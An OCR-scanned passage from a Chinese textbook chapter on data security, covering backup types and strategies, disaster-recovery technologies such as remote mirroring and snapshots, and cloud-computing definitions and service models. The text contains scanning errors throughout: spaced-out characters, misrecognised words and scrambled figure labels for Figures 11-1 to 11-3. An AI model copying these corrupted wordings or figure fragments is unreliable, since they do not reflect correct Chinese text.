护 , 如 通过 磁盘 阵列 ,数据 备份 和 异地 容 灾 等 手段 保证 数据 的 安全 。 

在 南城 区 中 小 企业 服务 平台 建设 方案 案例 中 ,只 有 服务 平台 在 保证 自身 数据 安全 的 
前 提 下 ,才能 使 中 小 企业 积极 主动 参与 到 云 平台 建设 中 ,实现 提高 服务 工作 办 理 效率 的 目 
的 。 作 为 一 个 典型 的 政务 信息 管理 系统 ,中 小 企业 平台 在 数据 安全 方面 必须 提供 一 种 主 
动 的 防护 措施 ,依靠 可 靠 、 完 整 的 安全 体系 与 安全 技术 来 保证 数据 内 容 的 安全 。 简 单 来 
讲 , 有 关 数 据 安全 的 内 容 可 以 简化 为 机 密 性 、 完 整 性 和 可 用 性 。 

本 章 接 下 来 的 内 容 将 主要 从 数据 的 防护 安全 角度 来 介绍 数据 备份 与 恢复 ,并 结合 新 
的 计算 环境 ,介绍 云 环境 下 数据 的 存储 管理 技术 和 云 数 据 的 安全 防护 技术 等 。 


11.2 数据 备份 与 恢复 


在 当今 复杂 的 计算 机 系统 应 用 环境 中 ,每 天 都 可 能 面 对 各 种 自然 灾害 和 人 为 灾难 的 
发 生 , 对 于 各 种 关键 性 业务 来 说 ,即使 是 几 分 钟 的 业务 中 断 和 数据 丢失 , 它 所 带 来 的 损失 
常常 也 是 难以 估量 的 。 在 信息 时 代 ,业务 的 发 展 离 不 开 信息 系统 ,而 构成 信息 系统 平台 的 
硬件 与 软件 都 不 是 系统 的 核心 价值 ,只 有 存储 于 计算 机 中 的 数据 才 是 真正 的 财富 。 企 业 
自身 发 展 中 的 众多 数据 如 何 保护 ,对 保证 业务 的 持续 性 至 关 重要 。 因 此 ,数据 备份 越 来 越 
得 到 企业 的 重视 。 在 数据 变 得 越 来 越 举足轻重 的 今天 ,一 套 稳 定 的 备份 还 原 系统 成 为 保 
证 系统 正常 运行 的 关键 组 件 。 数 据 备份 不 仅仅 是 数据 的 保存 ,还 包括 数据 备份 管理 、 备 份 
策略 等 。 
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数据 恢复 就 是 将 数据 恢复 到 事故 之 前 的 状态 。 数 据 恢复 总 是 与 备份 相对 应 ,实际 上 
可 以 看 成 备份 操作 的 逆 过 程 。 备 份 是 恢复 的 前 提 , 恢 复 是 备份 的 目的 ,无 法 恢复 的 备份 是 
没有 意义 的 。 因 此 ,在 信息 系统 安全 中 ,数据 恢复 是 不 可 忽略 的 ,而 事实 上 ,一 般 的 企业 往 
往 是 在 遭受 灾难 以 后 或 者 在 灾难 发 生 时 才 考 虑 到 数据 恢复 策略 ,此 时 已 经 无 法 挽回 损失 。 
因此 ,数据 恢复 技术 是 一 种 预防 性 的 措施 。 数 据 灾难 恢复 工作 对 信息 系统 的 建设 具有 举 
足 轻 重 的 作用 ,有 关 研 究 表明 ,各 行业 在 遭受 灾难 打击 造成 服务 中 断 时 所 带 来 的 损失 是 十 
分 巨大 的 : 证 券 业 每 小 时 的 损失 为 650 万 美元 ;信用 卡 授权 中 心 每 小 时 造成 的 损失 为 260 
万 美元 ;ATM 系统 中 断 造成 的 损失 每 小 时 为 14500 美元 。 由 于 服务 中 断 带 来 的 损失 巨 
大 ,美国 在 20 世纪 70 年 代 就 有 具有 灾 备 能 力 的 企业 ,经 过 四 十 多 年 的 发 展 已 经 形成 了 专 
业 的 灾 备 市 场 和 完善 的 灾难 恢复 系统 。 从 2004 年 10 月 开始 ,国务 院 信息 办 就 开始 着 手 
组 织 中 国人 民 银 行 、 信 息 产 业 部 等 8 个 国家 重要 信息 系统 主管 部 门 起 草 我 国 的 信息 系统 
灾难 恢复 有 关 标 准 , 并 成 立 (重要 信息 系统 灾难 恢复 规划 指南 ) 起 草 组 。 在 参考 有 关 国 际 
标准 的 前 提 下 ,结合 我 国 具 体 的 信息 安全 保障 国情 ,于 2005 年 5 月 26 日 正式 出 台 了 《 重 
要 信息 系统 灾难 恢复 规划 指南 》。 

数据 备份 和 恢复 技术 实质 上 就 是 根据 管理 规划 ,将 重要 数据 建立 副本 ,将 数据 副本 保 
存 到 与 原始 数据 不 同 的 存储 位 置 , 当 原始 数据 丢失 或 破坏 时 ,按照 一 定 的 恢复 策略 将 数据 
备份 恢复 出 原始 数据 的 过 程 。 数 据 备份 是 数据 恢复 的 前 提 条 件 , 数 据 恢 复 是 数据 备份 的 
最 终 目的 ,两 个 过 程 协同 工作 最 终 能 保障 数据 存储 的 安全 。 


1121 数据 备份 需求 


在 网 络 化 时 代 ,数据 面临 各 种 安全 风险 ,而 数据 的 备份 和 恢复 是 数据 安全 的 有 力 保 
障 。 顾 名 思 义 ,数据 备份 与 恢复 就 是 将 数据 以 某 种 方式 加 以 保留 ,以 便 在 系统 遭受 破 
坏 或 其 他 特定 情况 下 ,重新 加 以 恢复 的 一 个 过 程 。 例 如 ,在 日 常生 活 中 ,常常 为 自己 家 
的 家 门 多 配 几 把 钥匙 ,这 就 是 备份 的 一 个 具体 思想 体现 。 在 复杂 的 计算 机 信息 系统 
中 ,数据 备份 不 仅仅 是 简单 的 文件 复制 ,在 多 数 情况 下 是 指数 据 库 的 备份 。 所 谓 数 据 
库 的 备份 是 指 制作 数据 库 结 构 和 数据 的 复制 ,以 便 在 数据 库 遭 受 破坏 时 能 够 迅速 地 恢 
复数 据 库 系统 。 

长 期 以 来 ,对 企业 而 言 ,建立 一 套 可 行 的 备份 系统 相当 困难 ,主要 是 高 昂 的 成 本 和 技 
术 实 现 的 复杂 度 。 鉴 于 此 ,从 可 行 的 角度 来 说 ,一 个 数据 备份 与 恢复 系统 必须 有 良好 的 性 
价 比 。 

对 一 个 相当 规模 的 系统 来 说 ,让 系统 进行 完全 自动 化 的 备份 是 对 备份 系统 的 一 个 基 
本 要 求 。 除 此 以 外 ,数据 备份 系统 还 需要 重点 考察 机 器 CPU 占用 、 网 络 带宽 占用 、 单 位 
数据 量 的 备份 等 等 。 系 统 资源 的 开销 和 备份 过 程 给 系统 带 来 的 影响 是 不 可 小 帆 的 ,在 实 
际 环境 中 ,一 个 备份 作业 运行 过 程 中 ,可 能 会 占用 中 档 小 型 服务 器 60% 的 CPU 资源 ,而 
一 个 未 妥善 处 理 的 备份 日 志文 件 ,可 能 会 占用 大 量 的 磁盘 空间 。 这 些 都 是 来 自 真实 的 运 
行 环境 ,而 且 属于 普遍 现象 。 由 此 可 见 ,备份 系统 的 选择 和 优化 工作 也 是 一 个 至 关 重 要 的 
尾 务 。 
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即使 在 科技 发 达 的 今天 ,数据 备份 的 价值 仍然 不 能 忽略 ,数据 备份 仍然 作为 防止 数据 
丢失 的 首要 选择 。 在 日 常生 活 中 ,大 多 数 的 文档 数据 会 存储 在 信息 系统 中 ,因此 ,如 果 没 
有 数据 备份 系统 , 当 信息 系统 崩 淡 或 损坏 时 ,数据 会 全 部 丢失 ,再 也 恢复 不 出 来 。 例 如 , 当 
一 个 用 户 在 网 络 上 进行 一 宗 大 型 交易 时 ,相关 的 电脑 或 者 银行 服务 器 崩溃 ,导致 相关 的 文 
件 丢失 ,并 最 终 造 成 交易 数据 的 丢失 。 在 这 个 场景 中 ,除非 交易 双方 用 其 他 的 方式 可 以 证 
明 他 们 发 生 了 交易 ,不然 , 数 据 丢 失 会 给 双方 带 来 莫大 的 损失 。 

在 信息 系统 中 ,任何 东西 都 无 法 取代 原始 数据 的 地 位 ,因此 ,在 数据 丢失 的 情况 下 ,为 
能 使 数据 快速 高 效 的 恢复 ,数据 备份 是 最 好 的 也 是 首先 选择 的 技术 。 对 于 任何 一 个 组 织 ， 
没有 对 数据 进行 备份 是 非常 不 利 的 。 在 如 今 网 络 环境 下 ,每 一 次 数据 传输 都 要 经 过 复杂 
的 网 络 环境 ,经 过 大 量 的 网 络 设备 ,因此 ,一 旦 中 途 有 设备 崩溃 ,造成 数据 丢失 ,用 户 很 难 
找到 证 据 证 明 自 己 传输 了 这 条 数据 。 

另外 ,数据 备份 可 以 保证 用 户 数 据 的 可 用 性 和 完整 性 。 当 数据 库 系统 崩溃 并 丢失 所 
有 数据 后 ,信息 管理 系统 可 以 利用 备份 的 数据 进行 恢复 ,从 而 使 数据 重新 变 得 可 用 ,因此 
保证 了 数据 的 可 用 性 。 而 当 数据 完整 性 遭 到 破坏 时 ,信息 管理 系统 仍然 可 以 通过 数据 恢 
复 系统 将 备份 的 数据 恢复 。 从 而 可 见 ,数据 备份 是 信息 系统 中 不 可 或 缺 的 一 个 重要 组 成 
部 分 。 
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当前 根据 不 同 的 标准 ,数据 备份 有 不 同 的 类 型 ,例如 ,根据 数据 备份 的 位 置 分 类 可 分 
为 本 地 备份 和 异地 备份 ;根据 数据 备份 的 层次 上 划分 ,又 可 分 为 硬件 元 余 和 软件 元 余 ; 根 
据 数 据 备份 的 自动 化 程度 可 以 分 为 高 度 自 动 化 备份 、 按 计划 自动 化 备份 和 人 工 备 份 。 本 
节 着 重 介 绍 按 照 如 下 标准 划分 的 两 种 数据 备份 类 型 。 

1. 根据 数据 备份 的 状态 分 类 

(1) 物理 备份 , 指 将 实际 物理 数据 库 文件 复制 出 另 一 份 备份 的 形式 ,通常 所 说 的 冷 备 
份 . 热 备份 都 属于 物理 备份 。 具 体 而 言 , 冷 备份 ,也 称 脱 机 备份 , 指 以 正常 的 形式 关闭 数据 
库 , 并 对 数据 库 的 所 有 文件 进行 备份 ,在 恢复 期 间 , 用 户 无 法 访问 数据 库 , 需 要 花费 专门 的 
时 间 来 进行 。 热 备份 ,也 称 联机 备份 , 指 对 数据 库 运 行 的 情况 进行 备份 ,用 户 可 以 对 数据 
库 进 行 正常 的 操作 。 通 过 连接 正在 运行 的 数据 库 服 务 器 和 热 备份 服务 器 ,将 主 服 务 器 上 
的 数据 修改 传递 到 备份 数据 库 服务 器 中 ,保证 两 个 服务 器 的 同步 ,其 实质 是 一 种 实时 备 
份 ,两 个 数据 库 分 别 运行 在 不 同 的 服务 器 上 , 且 每 个 数据 库 的 文件 都 写 到 不 同 的 数据 设 
备 中 。 

(2) 逻辑 备份 ,与 物理 备份 不 同 , 不 是 将 数据 库 的 所 有 文件 都 进行 备份 ,而 是 将 某 个 
数据 库 的 记录 都 读 取 再 写 人 到 一 个 文件 中 ,这 是 经 常 使 用 的 一 种 备份 方式 。 

2. 根据 数据 备份 的 策略 分 类 

按照 备份 的 数据 量 来 说 ,可 以 分 为 完全 备份 . 增 量 备份 . 差 分 备份 。 

(1) 完全 备份 。 完 全 备份 指 对 系统 中 所 有 的 数据 进行 备份 ,特点 是 备份 时 间 最 长 ,但 
恢复 时 间 最 短 ,效率 最 高 ,操作 最 方便 ,也 是 最 可 靠 的 一 种 备份 方式 ,因此 ,一 般 在 周末 或 
者 夜里 用 户 较 少时 进行 备份 。 
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(2) 增 量 备份 。 增 量 备份 指 只 对 上 次 备份 后 产生 变化 的 数据 进行 备份 ,特点 是 备份 
时 间 短 ,占用 的 空间 也 比较 少 ,但 是 恢复 的 时 间 比 较 长 。 

(3) 差分 备份 。 差 分 备份 指 只 对 上 次 进行 完全 备份 后 产生 变化 的 数据 进行 备份 , 特 
点 是 备份 时 间 较 长 ,占用 空间 较 多 ,但 是 恢复 时 间 较 短 。 

具体 而 言 ,完全 备份 . 增 量 备份 及 差分 备份 之 间 的 关系 如 图 11-1 所 示 。 


周 日 ~~=- 一 - -人 希 一 ”周二 周三 。” 周 四 周 五 。 ” 周 六 
完全 
备份 
增 量 备份 
周 卜 、~- 一 - 税 一 周二 周三 周 四 周 五 周 六 
完全 备份 
周 日 ~~--- 咎 一 周二 周三 周 四 周 五 周 六 


完全 备份 
图 11-1 三 种 备份 方式 之 间 的 关系 


在 实际 备份 应 用 系统 中 ,通常 是 这 三 种 不 同 的 备份 技术 结合 实现 数据 备份 ,这 里 介绍 
两 种 结合 方式 。 

1) 完全 备份 和 增 量 备份 的 结合 

完全 备份 加 增 量 备份 源 于 完全 备份 ,不 过 减少 了 数据 移动 ,其 思想 就 是 较 少 使 用 完全 
备份 ,如 图 11-2 所 示 。 比 如 说 在 周 日 晚上 进行 完全 备份 (此 时 对 网 络 和 系统 的 使 用 最 
小 )。 在 其 他 6 天 (周一 到 周 六 ) 则 进行 增 量 备 份 。 增 量 备份 会 对 系统 进行 查询 , 当 查询 到 
从 昨天 开始 ,哪些 数据 发 生 了 变化 之 后 ,会 把 这 些 变化 的 数据 复制 到 当天 已 经 备 好 的 磁盘 
上 。 如 果 在 周一 到 周 六 使 用 增 量 备份 , 则 能 保证 只 移动 那些 在 最 近 24 小 时 内 改变 的 文 
件 , 而 不 是 所 有 的 文件 。 巾 于 只 对 较 少 的 数据 进行 移动 和 存储 ,所 以 增 量 备份 减少 了 对 磁 
盘 阵 列 的 需求 。 对 于 用 户 来 讲 , 则 可 以 在 一 个 高 度 自动 化 的 系统 中 使 用 更 加 集中 的 磁盘 
阵列 ,以 便 允许 多 个 客户 机 共享 存储 资源 。 

完全 备份 加 增 量 备份 的 明显 不 足 之 处 在 于 恢复 数据 较为 困难 。 完 整 的 恢复 过 程 首先 
需要 恢复 上 周 日 备份 的 完全 备份 数据 。 然 而 再 将 增 量 备份 的 数据 恢复 并 覆盖 掉 完 全 备份 
中 对 应 的 数据 。 因 此 ,该 策略 最 坏 的 情况 就 是 要 设置 7 个 磁盘 整理 ,如 果 每 天 都 有 数据 修 
改 , 则 需要 恢复 7 次 才能 将 所 有 的 数据 恢复 到 最 新 。 

2) 完全 备份 和 差分 备份 的 结合 

为 了 解决 完全 备份 加 增 量 备份 方法 中 数据 恢复 困难 的 问题 ,产生 了 完全 备份 加 差分 
备份 的 方法 。 因 此 ,数据 差异 性 成 为 了 备份 过 程 中 要 考虑 的 问题 。 在 采用 增 量 备份 时 , 需 
要 查询 自从 昨天 以 来 哪些 数据 发 生 了 变化 ,而 采用 差分 备份 的 方式 .需要 查询 自 完全 备份 
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图 11-2 完全 备份 和 增 量 备份 的 结合 


以 来 ,哪些 数据 发 生 了 变化 。 对 于 完全 备份 后 的 第 一 次 备份 ,因为 昨天 刚 对 数据 系统 进行 
了 完全 备份 ,所 以 在 周一 进行 备份 时 ,这 两 种 方法 备份 的 数据 是 一 样 的 。 但 是 到 了 周二 进 
行 备份 时 , 增 量 备份 只 需要 备份 从 昨天 (周一 ) 开 始 发 生 了 变化 的 数据 ,而 差分 备份 则 需要 
查询 自 上 次 完全 备份 ( 周 日 ) 后 发 生变 化 的 数据 ,并 把 这 些 变化 的 数据 备份 到 磁盘 阵列 中 。 
到 了 周三 时 , 增 量 备份 还 是 只 需要 备份 过 去 24 小 时 发 生变 化 的 数据 , 则 差分 备份 需要 备 
份 过 去 72 小 时 发 生变 化 的 数据 。 

尽管 差分 备份 比 增 量 备份 移动 和 存储 的 数据 更 多 ,但 是 在 进行 数据 恢复 时 就 比较 简 
单 。 在 完全 备份 加 差分 备份 方法 下 ,完整 的 恢复 过 程 包括 首先 对 上 周 日 完全 备份 的 数据 
进行 恢复 ,然后 再 将 最 新 差分 备份 的 数据 进行 恢复 并 覆盖 到 已 恢复 的 完全 备份 的 数据 中 ， 
如 图 11-3 所 示 。 


完全 差分 差分 差分 差分 差分 加 
备份 备份 备份 备份 备份 备份 
/ 2 下 加 


1 
学 1 一 一 一 一 
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图 11-3 完全 备份 和 差分 备份 的 结合 
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1123 数据 容 灾 技 术 


数据 备份 是 数据 高 可 用 的 最 后 一 道 防线 ,其 目的 是 为 了 系统 数据 崩溃 时 能 够 快速 地 
恢复 数据 。 然 而 ,数据 备份 只 是 容 灾 方案 中 的 一 种 ,而 且 它 的 容 灾 能 力 非常 有 限 ,因为 传 
统 的 备份 只 是 采用 数据 内 置 的 或 者 外 置 的 磁盘 设备 进行 冷 备份 ,备份 的 磁盘 同时 也 放 在 
机 房 中 统一 管理 ,一 旦 整个 机 房 出 现 灾 难 , 如 火灾 \ 盗 闪 或 者 地 震 灾难 时 ,这 些 备份 磁盘 也 
会 销毁 ,所 存储 的 磁盘 备份 也 起 不 到 任何 容 灾 功 能 。 

真正 的 数据 容 灾 就 是 要 避免 传统 冷 备份 所 具有 的 先天 不 足 , 它 能 在 灾难 发 生 时 ,全 
面 , 及 时 地 恢复 整个 系统 。 容 灾 按 其 容 灾 能 力 的 高 低 可 分 为 多 个 层次 ,例如 国际 标准 
SHARE 78 定义 的 容 灾 系 统 有 7 个 层次 : 从 最 简单 的 仅 在 本 地 进行 磁盘 备份 ,到 将 备份 
的 磁盘 存储 在 异地 ,再 到 建立 应 用 系统 实时 切换 的 异地 备份 系统 ,恢复 时 间 也 可 以 从 几 天 
到 小 时 级 ,分钟 级 、 秒 级 或 零 数 据 丢失 等 。 无 论 是 采用 哪 种 容 灾 方案 ,没有 备份 的 数据 , 任 
何 容 灾 方 案 都 没有 现实 意义 。 但 是 光 有 备份 数据 也 是 不 够 的 , 容 灾 也 必 不 可 少 。 

在 建立 容 灾 备 份 系统 时 会 涉及 多 种 技术 ,主要 有 以 下 几 种 : 远程 镜像 技术 、 快 照 技 
术 、 互 联 技术 和 虚拟 存储 等 。 

1. 远程 镜像 技术 

远程 镜像 技术 是 在 主 数据 中 心 和 备 援 中 心 之 间 的 数据 备份 时 用 到 。 镜 像 是 在 两 个 或 
多 个 磁盘 或 磁盘 子 系 统 上 产生 同一 个 数据 的 镜像 视图 的 信息 存储 过 程 ,一 个 称 为 主 镜像 
系统 , 另 一 个 称 为 从 镜像 系统 。 按 主 从 镜像 存储 系统 所 处 的 位 置 又 可 分 为 本 地 镜像 和 远 
程 镜像 。 本 地 镜像 的 主 从 镜像 存储 系统 是 处 于 同一 个 RAID 阵列 内 ,而 远程 镜像 的 主 从 
镜像 存储 系统 通常 是 分 布 在 跨 城 域 网 或 广域网 的 不 同 结 点 上 的 。 

远程 镜像 又 称 远程 复制 ,是 容 灾 备 份 的 核心 技术 ,同时 也 是 保持 数据 同步 和 实现 灾难 
恢复 的 基础 。 它 利用 物理 位 置 上 分 离 的 存储 设备 所 具备 的 远程 数据 连接 功能 ,在 远程 维 
护 一 套数 据 镜像 ,一旦 灾难 发 生 时 ,分布 在 异地 存储 器 上 的 数据 备份 并 不 会 受到 波及 。 远 
程 镜像 按 请 求 镜像 的 主机 是 否 需 要 远程 镜像 站 点 的 确认 信息 ,又 可 分 为 同步 远程 镜像 和 
异步 远程 镜像 。 

然而 ,远程 镜像 软件 和 相关 配套 设备 的 售 价 普遍 偏 高 ,而 且 , 至 少 得 占用 两 倍 以 上 的 
主 磁盘 空间 。 另 外 ,除了 价格 昂贵 之 外 ,远程 镜像 技术 还 有 一 个 致命 的 缺陷 , 它 无 法 阻止 
系统 失败 ,数据 丢失 、 损 坏 和 误 删 除 等 灾难 的 发 生 。 如 果 主 站 数据 丢失 ,备份 站 点 上 的 数 
据 也 将 出 现 连锁 反应 。 并 且 , 远 程 镜像 技术 还 存在 无 法 支持 异 构 磁 盘 阵 列 和 内 置 存储 组 
件 、 支 持 软件 种 类 匮乏 ,无 法 提供 文件 信息 等 诸多 缺点 。 

2. 快照 技术 

远程 镜像 技术 往往 同 快照 技术 结合 起 来 实现 远程 备份 , 即 通过 镜像 把 数据 备份 到 远 
程 存储 系统 中 ,再 用 快照 技术 把 远程 存储 系统 中 的 信息 备份 到 远程 的 磁盘 中 。 

快照 是 指 关于 指定 数据 集合 的 一 个 完全 可 用 复制 ,该 复制 包括 相应 数据 在 某 个 时 间 
点 (复制 开始 的 时 间 点 ) 的 影响 。 快 照 可 以 认为 是 其 所 表示 数据 的 一 个 副本 。 

从 具体 的 技术 细节 来 讲 , 快 照 是 通过 软件 对 要 备份 的 磁盘 子 系统 的 数据 快速 扫描 , 建 
立 一 个 要 备份 数据 的 快照 逻辑 单元 号 LUN 和 快照 Cache, 在 快速 扫描 时 ,把 备份 过 程 中 


第 人 1 章 数据 安全 \@®/ 


即将 要 修改 的 数据 块 同时 快速 复制 到 快照 Cache 中 。 快 照 LUN 是 一 组 指针 , 它 指向 快 
照 Cache 和 磁盘 子 系统 中 不 变 的 数据 块 。 在 正常 业务 进行 的 同时 ,利用 快照 LUN 实现 
对 原 数据 的 一 个 完全 的 备份 。 它 可 使 用 户 在 正常 业务 不 受 影响 的 情况 下 ,实现 提取 当前 
在 线 业 务 数据 。 其 “备份 窗口 ”接近 于 零 , 可 大 大 增加 系统 业务 的 连续 性 ,为 实现 系统 真正 
的 7X24 小 时 运转 提供 了 保证 。 快 照 是 通过 内 存 作为 缓冲 区 (快照 Cache) ,由 快照 软件 
提供 系统 磁盘 存储 的 即时 数据 映像 , 它 存 在 缓冲 区 调度 的 问题 。 

快照 的 作用 主要 是 能 够 进行 在 线 数 据 恢 复 , 当 存储 设备 发 生 应 用 故障 或 者 文件 损坏 
时 可 以 进行 及 时 数据 恢复 ,将 数据 恢复 成 快照 产生 时 间 点 的 状态 。 快 照 的 另 一 个 作用 是 
为 存储 用 户 提 供 了 另外 一 个 数据 访问 通道 , 当 原 数据 进行 在 线 应 用 处 理 时 ,用 户 可 以 访问 
快照 数据 ,还 可 以 利用 快照 进行 测试 等 工作 。 因 此 ,所 有 存储 系统 ,不 论 高 中 低 端 ,只 要 应 
用 于 在 线 系统 ,那么 快照 技术 就 成 为 一 个 不 可 或 缺 的 功能 。 

3. 互联 技术 

早期 的 主 数据 中 心 和 备 援 中 心 之 间 的 数据 备份 ,主要 是 基于 SAN 的 远程 复制 ( 镜 
像 ) , 即 通过 光纤 通道 FC, 把 两 个 SAN 链接 起 来 ,进行 远程 镜像 。 当 灾难 发 生 时 ,由 备 援 
数据 中 心 替代 主 数据 中 心 保证 系统 工作 的 连续 性 。 这 种 远程 容 灾 备 份 方式 存在 一 些 缺 
陷 , 如 实现 成 本 高 .设备 的 互 操作 性 差 .跨越 的 地 理 位 置 短 等 ,这 些 因素 阻碍 了 它 的 进一步 
推广 和 实用 。 

4. 虚拟 存储 

虚拟 化 存储 技术 在 系统 弹性 和 可 扩展 性 上 开创 了 新 的 局 面 。 它 将 几 个 IDE 或 SCSI 
驱动 器 等 不 同 的 存储 设备 串联 为 一 个 存储 池 。 存 储 集群 的 整个 存储 容量 可 以 分 为 多 个 小 
辑 卷 ,并 作为 虚拟 分 区 进行 管理 。 存 储 由 此 成 为 一 种 功能 而 非 物理 属性 ,而 这 正 是 基于 服 
务 器 的 存储 结构 存在 的 主要 限制 。 

虚拟 存储 系统 还 提供 了 动态 改变 逻辑 大 小 的 功能 。 事 实 上 ,存储 卷 的 容量 可 以 在 线 
随意 增加 或 减少 。 可 以 通过 在 系统 中 增加 或 减少 物理 磁盘 的 数量 来 改变 集群 中 逻辑 卷 的 
大 小 。 这 一 功能 允许 卷 的 容量 随 用 户 的 即时 要 求 动态 改变 。 另 外 ,存储 卷 能 够 很 容易 地 
改变 容量 移动 和 替换 。 安 装 系统 时 ,只 需 为 每 个 逻辑 卷 分 配 最 小 的 容量 ,并 在 磁盘 上 留 
出 剩余 的 空间 。 

存储 虚拟 化 的 一 个 关键 优势 是 它 允 许 异 质 系统 和 应 用 程序 共享 存储 设备 ,而 不 管 它 
们 位 于 何 处 。 


11.3 云 计算 技术 


当前 , 物 联 网 .大 数据 等 应 用 快速 的 发 展 对 系统 计算 和 数据 管理 带 来 新 的 要 求 , 云 计 
算 (Cloud Computing) 作 为 一 种 新 的 共享 基础 资源 的 技术 和 商业 模式 ,可 提供 高 效率 计算 
能 力 和 海量 数据 管理 ,提供 了 一 种 解决 新 需求 的 有 效 方案 。 本 节 从 云 计算 概 念 及 特点 出 
发 ,介绍 典型 的 云 计 算 体系 架构 ,以 及 当前 云 计算 数据 管理 中 的 主要 技术 。 
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1131 云 计 算 概述 


1. 云 计算 概念 

2006 年 ,Google 在 “Googlel101 计划 ”中 第 一 次 提出 云 计算 概念 和 理论 ,指出 云 计 算 
是 继 分 布 式 计算 (Distributed Computing)、 并 行 计 算 (Parallel Computing) 和 网 格 计算 
(Grid Computing) 之 后 的 一 种 新 的 商业 计算 模式 。 此 后 ,各 研究 机 构 从 不 同 的 角度 对 云 
计算 进行 了 不 同 的 定义 : 

IBM 技术 白皮书 中 的 定义 : 云 计算 一 词 描 述 了 一 个 系统 平台 或 一 类 应 用 程序 ;该 平 
台 可 以 根据 用 户 的 需求 动态 部 署 、 配 置 、 重 新 配置 以 及 取消 服务 等 ; 云 计 算是 一 种 可 以 通 
过 互联 网 进行 访问 的 可 扩展 的 应 用 程序 。 

Berkeley 白皮书 中 的 定义 : 云 计 算 包 括 互联 网 上 各 种 服务 形式 的 应 用 以 及 数据 中 心 
中 提供 这 些 服务 的 软 硬 件 设 施 。 互 联网 上 的 应 用 服务 一 直 被 称 作 软件 即 服 务 (Software 
as a Service,SaaS) ,而 数据 中 心 的 软 硬 件 设 施 就 是 云 。 

ISO/IEC JTC1 和 ITU-T 组 成 的 联合 工作 组 的 国际 标准 ISO/IEC17788《 云 计算 词 
汇 与 概述 》(Information technology-Cloud Computing-Overview and vocabulary) DIS 版 
中 的 定义 : 云 计算 是 一 种 将 可 伸缩 .弹性 .共享 的 物理 和 虚拟 资源 池 以 按 需 自 服务 的 方式 
供应 和 管理 ,并 提供 网 络 访问 的 模式 。 云 计算 模式 由 关键 特征 、 云 计算 角色 和 活动 、 云 能 
力 类 型 和 云 服务 分 类 、 云 部 署 模型 . 云 计算 共同 关注 点 组 成 。 

美国 标准 计算 研究 院 NIST 中 的 定义 : 云 计 算是 一 种 计算 模式 , 它 以 一 种 便捷 的 、 通 
过 网 络 按 需 接 入 到 一 组 已 经 配 好 的 计算 资源 池 , 如 网 络 、 服 务 器 、 存 储 、 应 用 程序 和 服务 
等 。 在 这 种 模式 中 ,计算 资源 将 以 最 小 的 管理 和 交互 代价 快速 提供 给 用 户 。 

目前 ,NIST 对 云 计算 的 定义 被 广泛 地 接受 ,其 给 出 了 云 计 算 的 5 个 基本 特征 、3 种 基 
本 服务 模式 以 及 4 种 部 署 模式 ,其 概念 可 用 图 11-4 形象 表示 。 


广泛 网 络 接 入 | | 快速 弹性 架构 | | 按 需 自 服务 | | 可 测量 的 服务 
基本 特征 
资源 池 化 
软件 即 服务 平台 即 服务 设施 即 服务 服务 模式 
公有 云 私有 云 社区 云 混合 云 部 署 模式 


图 11-4 NIST 中 云 计算 的 概念 模型 


2. 云 计算 特征 

基于 云 计算 的 概念 , 云 计算 主要 有 以 下 5 个 基本 特征 : 

(1) 广泛 网 络 接 入 : 用 户 可 从 任何 网 络 覆 盖 的 地 方 ,使 用 各 种 终端 设备 ,如 笔记 本 、 
智能 手机 ,平板 等 ,随时 随地 的 通过 互联 网 访问 云 计算 服务 。 
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(2) 快速 弹性 架构 : 服务 的 规模 可 快速 伸缩 ,以 自动 适应 业务 负载 的 动态 变化 。 用 
户 使 用 的 资源 同业 务 的 需求 相 一 致 ,避免 了 因 服 务 器 性 能 过 载 或 元 余 而 导致 服务 质量 下 
降 或 资源 浪费 。 

(3) 资源 池 化 : 资源 以 共享 资源 池 的 方式 统一 管理 。 利 用 虚拟 化 技术 ,将 资源 分 享 
给 不 同 用 户 ,资源 的 放置 ,管理 和 分 配 策略 对 用 户 透 明 。 

(4) 按 需 自 服务 : 以 服务 的 形式 为 用 户 提 供应 用 程序 数据 存储 、 基 础 设施 等 资源 ， 
并 可 根据 用 户 需 求 , 自 动 分 配 资源 ,而 不 需要 系统 管理 员 的 干预 。 

(5) 可 测量 的 服务 : 通过 监控 用 户 的 资源 使 用 量 , 并 根据 资源 的 使 用 情况 对 服务 计 
费 。 通 过 该 特性 ,可 优化 并 验证 已 交付 的 云 服 务 。 这 个 关键 特性 强调 客户 只 需 对 使 用 的 
资源 付费 。 

3. 云 计算 分 类 

按照 云 计算 的 服务 模式 , 云 计算 可 分 为 : 

(1) 软件 即 服务 (Software as a Service,SaaS)。SaaS 是 指向 用 户 提 供 使 用 运行 在 云 
基础 设施 上 的 某 些 应 用 软件 的 能 力 。 用 户 可 使 用 各 种 类 型 终端 设备 上 搭载 的 “ 瘦 ” 客 户 端 
或 程序 界面 来 访问 应 用 。 用 户 不 需要 管理 或 控制 底层 的 云 基 础 设施 ,如 网 络 、 服 务 器 、 操 
作 系 统 、 存 储 等 ,只 需要 配置 某 些 参数 即 可 。 典 型 的 应 用 有 : Salesforce 的 客户 关系 管理 
系统 CRM,Google 的 在 线 办 公 自动 化 软件 等 。 

(2) 平台 即 服务 (Platform as a Service, PaaS)。PaaS 是 指 为 用 户 提供 在 云 基础 设施 
之 上 部 署 定制 应 用 的 系统 软件 平台 。 该 平台 允许 用 户 使 用 平台 所 支持 的 开发 请 言 和 软件 
工具 ,部 署 自己 需要 的 软件 运行 环境 和 配置 。 用 户 不 需要 管理 或 控制 底层 的 云 基础 设施 ， 
底层 服务 对 用 户 是 透明 的 。 典 型 的 代表 有 : Google App Engine、Microsoft Azure 等 。 

(3) 基础 设施 即 服务 (Infrastructure as a Service,IaaS) 。IaaS 是 指 通过 虚拟 化 技术 
来 组 织 底层 网 络 连接 .服务 器 等 物理 设备 ,为 用 户 提供 资源 租用 与 管理 服务 。 在 使 用 
IaaS 服务 过 程 中 ,用 户 需要 向 IaaS 层 服务 提供 商 提供 基础 设施 的 配置 信息 ,运行 于 基础 
设施 的 程序 代码 以 及 相关 的 用 户 数据 。 典 型 的 代表 有 : Amazon 的 Web 服务 ,包括 弹性 
计算 云 EC2 ,简单 存储 服务 S3 和 结构 化 数据 存储 服务 SimpleDB,IBM 公司 的 蓝 云 Blue 
Cloud、Sun 的 云 基础 设施 平台 IAAS 等 。 

按照 云 计算 的 部 署 模 式 , 云 计算 可 分 为 : 

(1) 公有 云 (Public Cloud) : 由 某 个 组 织 拥 有 ,其 云 基础 设施 向 普通 用 户 、 公 司 或 各 
类 组 织 提 供 云 服务 。 

(2) 私有 云 (Private Cloud) : 云 基础 设施 特定 为 某 个 组 织 运行 服务 ,可 以 是 该 组 织 或 
